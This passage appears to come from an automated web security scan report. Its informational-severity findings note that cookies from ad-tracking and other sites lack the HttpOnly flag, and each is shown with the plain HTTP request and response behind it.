Host: clk.redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.125. http://clk.redcated/BEL/go/262582811/direct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clk.redcated
Path:	/BEL/go/262582811/direct

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

AA002=001296353269-3932791; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
MUID=CE711711131C4C8D81F8D0F57B52D165; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
ach00=bab9/1c72; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
ach01=af8724c/1c72/fa6b21b/bab9/4d44c7f5; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BEL/go/262582811/direct HTTP/1.1
Host: clk.redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.126. http://clk.redcated/CNT/go/286609711/direct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clk.redcated
Path:	/CNT/go/286609711/direct

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

AA002=001296353204-3934536; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
MUID=B03CF75FE18B4C4488D98A18A160243C; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
ach00=a0b6/1a43a; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
ach01=bf2ec3a/1a43a/1115512f/a0b6/4d44c7b4; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /CNT/go/286609711/direct HTTP/1.1
Host: clk.redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://attuverseoffers.com/page4/index.html?1&source=ECbc0000000WIP00O&GUID=64701E1B-0B1A-4566-86D1-3CFA683F0759
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001296353204-3934536; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: MUID=B03CF75FE18B4C4488D98A18A160243C; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach00=a0b6/1a43a; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach01=bf2ec3a/1a43a/1115512f/a0b6/4d44c7b4; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Connection: close
Date: Sun, 30 Jan 2011 02:06:43 GMT
Connection: close

17.127. http://clk.redcated/CNT/go/287065754/direct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clk.redcated
Path:	/CNT/go/287065754/direct

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

AA002=001296353207-3943143; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
MUID=3467FF0EC8A04BA6ADED05C9CB0F7837; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
ach00=bab9/25d1; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
ach01=bab2264/25d1/111c469a/bab9/4d44c7b7; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /CNT/go/287065754/direct HTTP/1.1
Host: clk.redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.128. http://clk.redcated/CNT/go/299297287/direct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clk.redcated
Path:	/CNT/go/299297287/direct

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

AA002=001296344744-9189356; expires=Monday, 28-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
MUID=ADE9FC21333E46488D7A7ABFE892B219; expires=Wednesday, 17-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
ach00=bab9/1a43a; expires=Monday, 28-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
ach01=be75985/1a43a/11d6ea07/bab9/4d44a6a8; expires=Monday, 28-Jan-2013 00:00:00 GMT; path=/; domain=.redcated

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /CNT/go/299297287/direct HTTP/1.1
Host: clk.redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.129. http://clk.redcated/NFX/go/297941249/direct/01/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clk.redcated
Path:	/NFX/go/297941249/direct/01/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

AA002=001296344741-9183539; expires=Monday, 28-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
MUID=911C5A9886C74D1D85E6D49FC8A33620; expires=Wednesday, 17-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
ach00=bab9/1c4e; expires=Monday, 28-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
ach01=bf3b0a8/1c4e/11c23901/bab9/4d44a6a5; expires=Monday, 28-Jan-2013 00:00:00 GMT; path=/; domain=.redcated

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /NFX/go/297941249/direct/01/ HTTP/1.1
Host: clk.redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.130. http://clk.redcated/ULA/go/296652509/direct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clk.redcated
Path:	/ULA/go/296652509/direct

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

AA002=001296350513-3979227; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
MUID=27C92A747D6B4A87B8366284DD8E4677; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
ach00=bab9/1b1dd; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
ach01=3cb5efe/1b1dd/11ae8edd/bab9/4d44bd31; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ULA/go/296652509/direct HTTP/1.1
Host: clk.redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.131. http://clk.redcated/go/286026710/direct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clk.redcated
Path:	/go/286026710/direct

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

AA002=001296350513-3980097; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
MUID=2652D8E3C448492EBAA5519D4E847438; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
ach00=bab9/1c5b3; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
ach01=4bd5098/1c5b3/110c6bd6/bab9/4d44bd31; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /go/286026710/direct HTTP/1.1
Host: clk.redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.132. http://clk.redcated/go/286609711/direct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clk.redcated
Path:	/go/286609711/direct

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

AA002=001296353255-3938625; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
MUID=9B933D979CFB4CC081B176EF97E8AAD9; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
ach00=a0b6/1a43a; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
ach01=bf2ec3a/1a43a/1115512f/a0b6/4d44c7e7; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /go/286609711/direct HTTP/1.1
Host: clk.redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://attuverseoffers.com/page4/index.html?1&source=ECbc0000000WIP00O&GUID=64701E1B-0B1A-4566-86D1-3CFA683F0759
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001296353255-3938625; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: MUID=9B933D979CFB4CC081B176EF97E8AAD9; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach00=a0b6/1a43a; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach01=bf2ec3a/1a43a/1115512f/a0b6/4d44c7e7; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Connection: close
Date: Sun, 30 Jan 2011 02:07:35 GMT
Connection: close

17.133. http://clk.redcated/go/287065754/direct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clk.redcated
Path:	/go/287065754/direct

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

AA002=001296353257-3947053; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
MUID=CDB74D90C77343EFBA0AEB977000E321; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
ach00=bab9/25d1; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
ach01=bab2264/25d1/111c469a/bab9/4d44c7e9; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /go/287065754/direct HTTP/1.1
Host: clk.redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.wireless.att.com/cell-phone-service/cell-phones/motorola.jsp?startFilter=false&feacondition=newphone&source=ECWD000000000000O
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001296353257-3947053; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: MUID=CDB74D90C77343EFBA0AEB977000E321; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach00=bab9/25d1; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach01=bab2264/25d1/111c469a/bab9/4d44c7e9; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Connection: close
Date: Sun, 30 Jan 2011 02:07:36 GMT
Connection: close

17.134. http://clk.redcated/go/296652509/direct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clk.redcated
Path:	/go/296652509/direct

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

AA002=001296350513-3979647; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
MUID=93E807CC859C4B04A5E7B8BADD66DD24; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
ach00=bab9/1b1dd; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
ach01=3cb5efe/1b1dd/11ae8edd/bab9/4d44bd31; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /go/296652509/direct HTTP/1.1
Host: clk.redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001296350513-3979647; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: MUID=93E807CC859C4B04A5E7B8BADD66DD24; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach00=bab9/1b1dd; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach01=3cb5efe/1b1dd/11ae8edd/bab9/4d44bd31; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Connection: close
Date: Sun, 30 Jan 2011 01:21:52 GMT
Connection: close

17.135. http://clk.redcated/goiframe/184054348/262582811/direct/01 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clk.redcated
Path:	/goiframe/184054348/262582811/direct/01

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

AA002=001296353210-3953580; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
MUID=C399BF76ECC4498AABC770564CEE637F; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
ach00=bab9/1c72; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
ach01=af8724c/1c72/fa6b21b/bab9/4d44c7ba; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /goiframe/184054348/262582811/direct/01 HTTP/1.1
Host: clk.redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.sharebuilder.com/affiliates/?PC=sb&SID=520062934056594&MGDURL=Web%2Fwelcome%2Fwp%2Findex.htm&cmpid=10101414
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001296353210-3953580; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: MUID=C399BF76ECC4498AABC770564CEE637F; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach00=bab9/1c72; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach01=af8724c/1c72/fa6b21b/bab9/4d44c7ba; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Connection: close
Date: Sun, 30 Jan 2011 02:06:50 GMT
Connection: close

17.136. http://clk.redcated/goiframe/199711109/299297287/direct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clk.redcated
Path:	/goiframe/199711109/299297287/direct

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

AA002=001296344745-9193135; expires=Monday, 28-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
MUID=B310B20DA83E464695664804CCAE6E71; expires=Wednesday, 17-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
ach00=bab9/1a43a; expires=Monday, 28-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
ach01=be75985/1a43a/11d6ea07/bab9/4d44a6a9; expires=Monday, 28-Jan-2013 00:00:00 GMT; path=/; domain=.redcated

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /goiframe/199711109/299297287/direct HTTP/1.1
Host: clk.redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://attuverseoffers.com/page4/index.html?1
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001296344745-9193135; expires=Monday, 28-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: MUID=B310B20DA83E464695664804CCAE6E71; expires=Wednesday, 17-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach00=bab9/1a43a; expires=Monday, 28-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach01=be75985/1a43a/11d6ea07/bab9/4d44a6a9; expires=Monday, 28-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Connection: close
Date: Sat, 29 Jan 2011 23:45:45 GMT
Connection: close

17.137. http://context3.kanoodle.com/cgi-bin/context.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://context3.kanoodle.com
Path:	/cgi-bin/context.cgi

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

vi_1.011=129639990201622008000000106049048; domain=.kanoodle.com; path=/; expires=Mon, 30-Jan-2012 15:05:02 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

17.138. http://conveu.admailtiser.com/st previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://conveu.admailtiser.com
Path:	/st

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

cicouid=cc7abda8-722d-4cd3-b76a-29b02a48647arcjRQOvWHnoil_sqd2OXzw; Domain=.admailtiser.com; Expires=Mon, 30-Jan-2012 01:23:50 GMT; Path=/
ciconv0=6940311042157494960$8601-c1fe3893-3748-4f39-bb7c-f9bd561f5dc2; Domain=.admailtiser.com; Expires=Mon, 31-Jan-2011 01:23:50 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.139. http://d7.zedo.com/bar/v16-401/d2/jsc/fm.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-401/d2/jsc/fm.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

FFgeo=5386156;expires=Sun, 29 Jan 2012 23:16:32 GMT;domain=.zedo.com;path=/;
FFcat=929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
FFad=3:0:0:1:0:0;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.140. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-401/d3/jsc/fm.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

FFad=0:3:0:0:1:0:0;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
FFcat=1394,2,14:929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-401/d3/jsc/fm.js?c=2&a=0&f=&n=1394&r=13&d=14&q=&$=&s=2&l=http%3A//atl.whitepages.com/adclick/CID%3D0000e376b2c762f700000000/relocate%3D&z=0.718691564630717 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; ZCBC=1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; FFad=3:0:0:1:0:0; FFcat=929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7

Response

17.141. http://deals.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://deals.redacted
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=af553d4f97984ae69ffeb82fbcef5634; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=DAFE261BA5894DCFB4A71871ED1DEC9A; domain=.redacted; expires=Wed, 17-Aug-2011 23:46:01 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: deals.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.142. http://dg.specificclick.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dg.specificclick.net
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

adp=79jE^0^4095; Domain=.specificclick.net; Expires=Mon, 30-Jan-2012 01:37:56 GMT; Path=/
ug=uosDj9Liw_xRTA; Domain=.specificclick.net; Expires=Mon, 30-Jan-2012 01:37:56 GMT; Path=/
smdmp=780z:1215201001^780z:201201001^780z:1012200938^780z:1011201009^77xf:99004015^77xe:99001525^77x6:99011769^75W4:99002797^75W4:99004740^74ry:104201102^74ry:811200901^74Xd:99063500; Domain=.specificclick.net; Expires=Mon, 30-Jan-2012 01:37:56 GMT; Path=/
adf=79jE^0^0; Domain=.specificclick.net; Expires=Mon, 30-Jan-2012 01:37:56 GMT; Path=/
ug=uosDj9Liw_xRTA; Domain=.specificclick.net; Expires=Mon, 30-Jan-2012 01:37:56 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.143. http://digitalnature.ro/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://digitalnature.ro
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

wassup=NmZkYmU5YTNiMjRjOGYzMjlhMTQwNDNjNDE3M2M3ZGU6OjEyOTYzNTU5OTA6Ojo6MTczLjE5My4yMTQuMjQzOjoxNzMuMTkzLjIxNC4yNDMtc3RhdGljLnJldmVyc2Uuc29mdGxheWVyLmNvbQ%253D%253D; expires=Sun, 30-Jan-2011 02:58:10 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: digitalnature.ro
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:08:10 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
X-Pingback: http://digitalnature.ro/xmlrpc.php
Set-Cookie: wassup=NmZkYmU5YTNiMjRjOGYzMjlhMTQwNDNjNDE3M2M3ZGU6OjEyOTYzNTU5OTA6Ojo6MTczLjE5My4yMTQuMjQzOjoxNzMuMTkzLjIxNC4yNDMtc3RhdGljLnJldmVyc2Uuc29mdGxheWVyLmNvbQ%253D%253D; expires=Sun, 30-Jan-2011 02:58:10 GMT; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10203

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-e
...[SNIP]...

17.144. http://digitalnature.ro/projects/fusion previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://digitalnature.ro
Path:	/projects/fusion

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

wassup=NmZkYmU5YTNiMjRjOGYzMjlhMTQwNDNjNDE3M2M3ZGU6OjEyOTYzNTU5OTA6Ojo6MTczLjE5My4yMTQuMjQzOjoxNzMuMTkzLjIxNC4yNDMtc3RhdGljLnJldmVyc2Uuc29mdGxheWVyLmNvbQ%253D%253D; expires=Sun, 30-Jan-2011 02:58:10 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /projects/fusion HTTP/1.1
Host: digitalnature.ro
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 30 Jan 2011 02:08:09 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
X-Pingback: http://digitalnature.ro/xmlrpc.php
Set-Cookie: wassup=NmZkYmU5YTNiMjRjOGYzMjlhMTQwNDNjNDE3M2M3ZGU6OjEyOTYzNTU5OTA6Ojo6MTczLjE5My4yMTQuMjQzOjoxNzMuMTkzLjIxNC4yNDMtc3RhdGljLnJldmVyc2Uuc29mdGxheWVyLmNvbQ%253D%253D; expires=Sun, 30-Jan-2011 02:58:10 GMT; path=/
Location: http://digitalnature.ro/projects/fusion/
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

17.145. http://dm.de.mookie1.com/2/B3DM/2010DM/1860849269@x23 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/1860849269@x23

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6c45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2/B3DM/2010DM/1860849269@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
